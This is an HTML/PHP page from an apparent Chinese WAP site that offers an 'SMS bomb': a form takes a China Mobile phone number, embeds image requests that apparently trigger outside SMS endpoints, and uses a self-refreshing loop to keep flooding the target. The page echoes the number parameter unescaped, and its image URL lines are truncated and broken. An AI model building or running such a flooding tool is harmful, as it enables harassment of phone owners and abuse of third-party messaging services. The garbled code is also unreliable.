<!DOCTYPE html PUBLIC
"-//WAPFORUM//DTD XHTML Mobile 1.0//EN"
"http://www.wapforum.org/DTD/xhtml-mobile10.dtd"
>
<html xmlns=
"http://www.w3.org/1999/xhtml"
>
<head>
<meta http-equiv=
"Content-Type"
content=
"text/html;charset=UTF-8"
/>
<meta http-equiv=
"Cache-Control"
content=
"max-age=0"
forua=
"true"
/>
<meta http-equiv=
"Cache-Control"
content=
"no-cache"
/>
<meta http-equiv=
"Expires"
content=
"0"
/>
<link rel=
"stylesheet"
href=
"http://tuvvv.com/tuvvv.css?1.1.6"
type=
"text/css"
/>
<title>短信炸弹</title>
</head>
<body>
<p
class
=
"title"
><a href=
"/"
>首页</a>>移动短信炸弹</p>
<p
class
=
"nav"
><p
class
=
"tip"
>请填写要炸的手机号码(此炸弹只有移动号才能用,是免费的,但手机必须要开启图片显示)
</p></p>
<p
class
=
"title"
>
--=手机号码=--</p>
<p
class
=
"nav"
>
<form method='GET' action='index.php'>
<input name='hm' value='' size='15' maxlength='10000'/><input type=
"hidden"
name=
"c"
value=
"1"
/>
<br/><input type='submit' name='ok' value='[开始狂炸]'/>
</form>
<?php
error_reporting
(0);
$v
=
$_GET
['c'];
$a
=
$v
+1;
$e
=
$a
-1;
$d
=
$_GET
['hm'];
?>
<p
class
=
"tip"
><?php
if
(
$d
>1){
echo
"<br/>OK,成功轰炸$d,第$e.次"
;
echo
"<img src='http:
<img src='http:
<img src='http:
echo
"<meta http-equiv=refresh content='0; url=dxzd.php?hm=$d&c=$a'>"
;
}
else
{
echo
"<br/>请输入手机号码!"
;
}
?>
</p>
</p>
</body>
</html>